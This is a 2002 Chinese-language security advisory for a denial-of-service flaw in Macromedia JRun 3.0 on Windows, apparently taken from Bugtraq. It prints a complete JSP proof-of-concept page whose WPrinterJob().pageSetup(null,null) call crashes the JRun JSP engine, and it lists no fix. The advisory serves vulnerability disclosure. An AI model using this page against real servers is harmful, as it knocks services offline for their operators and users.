Macromedia JRun JSP引擎存在拒绝服务攻击发布时间:2002-06-15 更新时间:2002-06-15 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:客户机模式 BUGTRAQ ID:4997 受影响系统 Macromedia JRun 3.0详细描述 Macromedia JRun for Windows存在一个拒绝服务攻击漏洞,当JRUN处理畸形JSP页面时,可使RUN崩溃。 当处理如下代码时可导致JRUN JSP引擎崩溃: new WPrinterJob().pageSetup(null,null); 测试代码 <%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1" %> <%@ page import="sun.awt.windows.*" %> <%! %> <% // %> <html> <head> <title>aa</title> </head> <body> <p> <FONT SIZE="+2">dON/T TR1 thiz @ home</font> </p> <% new WPrinterJob().pageSetup(null,null); %> </body> </html> 解决方案 无 相关信息 Marc Schoenefeld <marc.schoenefeld@uni-muenster.de>. 参考:http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0095.html 相关主页:http://www.macromedia.com/software/jrun/ |
